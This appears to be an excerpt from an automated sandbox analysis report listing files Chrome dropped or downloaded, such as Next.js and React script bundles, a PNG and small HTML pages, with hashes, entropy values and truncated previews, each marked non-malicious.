              Preview:<!DOCTYPE html><html><head><meta charSet="utf-8" data-next-head=""/><meta name="viewport" content="width=device-width" data-next-head=""/><link rel="preload" href="/_next/static/css/05a702e55f1806c7.css" as="style"/><link rel="preload" href="/_next/static/css/dfec9835995d9658.css" as="style"/><link rel="stylesheet" href="/_next/static/css/05a702e55f1806c7.css" data-n-g=""/><link rel="stylesheet" href="/_next/static/css/dfec9835995d9658.css" data-n-p=""/><noscript data-n-css=""></noscript><script defer="" noModule="" src="/_next/static/chunks/polyfills-42372ed130431b0a.js"></script><script src="/_next/static/chunks/webpack-8cac0b4b405cede1.js" defer=""></script><script src="/_next/static/chunks/framework-1ee1b762209da1bd.js" defer=""></script><script src="/_next/static/chunks/main-bc5cca2169ff8412.js" defer=""></script><script src="/_next/static/chunks/pages/_app-bc94df786567e722.js" defer=""></script><script src="/_next/static/chunks/505-9e2e874ee1d3229d.js" defer=""></script><script s
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):77
              Entropy (8bit):4.37144473219773
              Encrypted:false
              SSDEEP:
              MD5:B6652DF95DB52FEB4DAF4ECA35380933
              SHA1:65451D110137761B318C82D9071C042DB80C4036
              SHA-256:6F5B4AA00D2F8D6AED9935B471806BF7ACEF464D0C1D390260E5FE27F800C67E
              SHA-512:3390C5663EF9081885DF8CDBC719F6C2F1597A4E25168529598097E9472608A4A62EC7F7E0BC400D22AAC81BF6EA926532886E4DC6E4E272D3B588490A090473
              Malicious:false
              Reputation:unknown
              Preview:self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:PNG image data, 1920 x 920, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):580703
              Entropy (8bit):7.96847734645623
              Encrypted:false
              SSDEEP:
              MD5:FF1088D824EB1737F6D43CC1AFE1A02F
              SHA1:DB17FB9C7E6AEEFEBC6C4D626C3D55B33E79CECE
              SHA-256:5E436210458B346BA020CE0A74708D0EAB369B8B2CF68E6768319C9B43560FD5
              SHA-512:0C96F310A2BAF6563170D370F20AFC46AD750EEDE83A6E00CB09868B4A6EA5F6EACE67162D9267641CB34162A0A6680AC285CC2903AB46E2B90E9B0ECA510CE4
              Malicious:false
              Reputation:unknown
              Preview:.PNG........IHDR.............4h.#....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^..g.,.u&....0.........dHJ"EQ-.-.....53.._c.5...5o.73.Z.V.=.n...)R.=.:.4.Hx.....T..o..'NFdFVeVeU./o.w..................,j^=.baeF;..X...@ .....@ .....@ .....e.).EA.l...l.C.e.}N.....u.<q...c.5....@ .....@ .....@ ........;'....6...j.xh`.Q..ScR0q...V.^...@ .....@ .....@ ......g.j.....Q....:\h.#...h..=\.{.....@ .....@ .....@ .........K..|G.y.8u0........0.....@ .....@ .....@ 0.X..U...6.aG5p.8....X.....+....@ .....@ .....@ .......c...rB...uD....@.J.....X.{...2.....@ .....@ .....@ ...z.&h/m(.F.....e.*&j0c....@ .....@ .....@ ......J..X......(-.....%.D.f,X.{.....@ .....@ .....@ .X.X..^...6.rDS..w...K..............Dbn.....@ .......)#fk...@ .....+......e..>k....X.....@ ..)l.wv......"p.*....@ ..0%.....4.fm,....@ ..,.b!x.0!.........@ 0r`.wv..;+.rn...........@ .Z0;;#........hjz:....@ .....+.U..g...t...:|.uz.W.g.E.c.u.n..<Z.n...%\.^.........@`)...gN..ki..f....@ .X.8q
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (17979), with no line terminators
              Category:dropped
              Size (bytes):17979
              Entropy (8bit):5.29731697786781
              Encrypted:false
              SSDEEP:
              MD5:86FE425FA9013D1F3240440D8B5082B8
              SHA1:F5CB4BD1C90B97828637864BBAD3C3854A8DCF5B
              SHA-256:D41484D76161B953622FA8DCF795B36E389875DB8E80C2123B53BF309EC9EE66
              SHA-512:558E3B8B7191F2C8A0551D4284AC730C7A9535B2922FD922864F2D0EC9BA42539C4C461A417E96ABFC7BEF7A9C91DC3647A6FDCC9A5B7FA425DAE9B57862BE90
              Malicious:false
              Reputation:unknown
              Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[505],{2505:(e,t,r)=>{e.exports=r(8015)},5592:(e,t,r)=>{"use strict";var n=r(9516),o=r(7522),s=r(3948),i=r(9106),a=r(9615),u=r(2012),c=r(4202),f=r(7763);e.exports=function(e){return new Promise(function(t,r){var p=e.data,l=e.headers,d=e.responseType;n.isFormData(p)&&delete l["Content-Type"];var h=new XMLHttpRequest;if(e.auth){var m=e.auth.username||"",g=e.auth.password?unescape(encodeURIComponent(e.auth.password)):"";l.Authorization="Basic "+btoa(m+":"+g)}var v=a(e.baseURL,e.url);function y(){if(h){var n="getAllResponseHeaders"in h?u(h.getAllResponseHeaders()):null;o(t,r,{data:d&&"text"!==d&&"json"!==d?h.response:h.responseText,status:h.status,statusText:h.statusText,headers:n,config:e,request:h}),h=null}}if(h.open(e.method.toUpperCase(),i(v,e.params,e.paramsSerializer),!0),h.timeout=e.timeout,"onloadend"in h?h.onloadend=y:h.onreadystatechange=function(){h&&4===h.readyState&&(0!==h.status||h.responseURL&&0===h.responseURL.indexOf(
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (65465)
              Category:downloaded
              Size (bytes):141509
              Entropy (8bit):5.265617642370106
              Encrypted:false
              SSDEEP:
              MD5:61F939AE3F923268BD07C4BDC8922169
              SHA1:9EBFDEBA15F8F90DFB264A444B58E0E78B72ED9D
              SHA-256:9DF45820953F5CD3E859457DD29CC48A900F6B4CA0E402EDBBF237222469F697
              SHA-512:5AE116CC03DDB1624A7259B197F8C7F7C41BD6637746C5B59CE17AFD0AB103C008B1DC6E86AC95FF4B757203F0F38450A81379BB390C2F2F9364D59CBF996B2F
              Malicious:false
              Reputation:unknown
              URL:https://bu.marcel-andree.de/static/js/main.103925a0.js
              Preview:/*! For license information please see main.103925a0.js.LICENSE.txt */.(()=>{"use strict";var e={730:(e,n,t)=>{var r=t(43),l=t(853);function a(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var o=new Set,u={};function i(e,n){s(e,n),s(e+"Capture",n)}function s(e,n){for(u[e]=n,e=0;e<n.length;e++)o.add(n[e])}var c=!("undefined"===typeof window||"undefined"===typeof window.document||"undefined"===typeof window.document.createElement),f=Object.prototype.hasOwnProperty,d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u30
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:downloaded
              Size (bytes):113814
              Entropy (8bit):5.398326238584444
              Encrypted:false
              SSDEEP:
              MD5:6A40BF625AC80DAC20CFF570F8C44D82
              SHA1:288149DBE165F6EC3C52C30F175FEBEBC69B25C1
              SHA-256:929166AD32BF0261E53E7DC11888D9E9905AC37B4A63B5299378BD6500B69A0B
              SHA-512:90B590C34DCE4F027A6F71060B9BA10B5CB2AD348C42A743DEBE0526BFEFC29475E4E05EE0F911B8A20FB0BEF7941C556ADCF15EF37F22184ED8CBA6ED218AF8
              Malicious:false
              Reputation:unknown
              URL:https://log.the-network-expert.ca/_next/static/chunks/main-bc5cca2169ff8412.js
              Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[792],{8925:(e,t)=>{"use strict";function r(){return""}Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"getDeploymentIdQueryOrEmptyString",{enumerable:!0,get:function(){return r}})},4599:()=>{"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var e=/\((.*)\)/.exec(this.toString());return e?e[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(e,t){return t=this.concat.apply([],this),e>1&&t.some(Array.isArray)?t.flat(e-1):t},Array.prototype.flatMap=function(e,t){return this.map(e,t).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(e){if("function"!=typeof e)return this.then(e,e);var t=this.constructor||Promise;return this.then(function(
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:HTML document, ASCII text, with very long lines (317), with no line terminators
              Category:downloaded
              Size (bytes):317
              Entropy (8bit):4.840511553465553
              Encrypted:false
              SSDEEP:
              MD5:86E25B4AD7CCA64D147D0F796CFBB00C
              SHA1:4E6F6CDDF8F9B1EA9DF5468E9E225608F1288B78
              SHA-256:6ADB34AE8DBD183632AA3BB672CC1BA138073A7E50EC179257C6A9226B4E73DD
              SHA-512:30DFBDC79ECE788A3D8220718CB3A47E4A67FE5CAAED46E116ACD1F11BBBF10919BEBA97D8B3B5753C7C90A3CBC56F69A97BC5B932E2ECFBE02D2A2D8F58D544
              Malicious:false
              Reputation:unknown
              URL:https://bu.marcel-andree.de/
              Preview:<!doctype html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><title>Rdm</title><script defer="defer" src="/static/js/main.103925a0.js"></script><link href="/static/css/main.8dcd9789.css" rel="stylesheet"></head><body><div id="root"></div></body></html>
              No static file info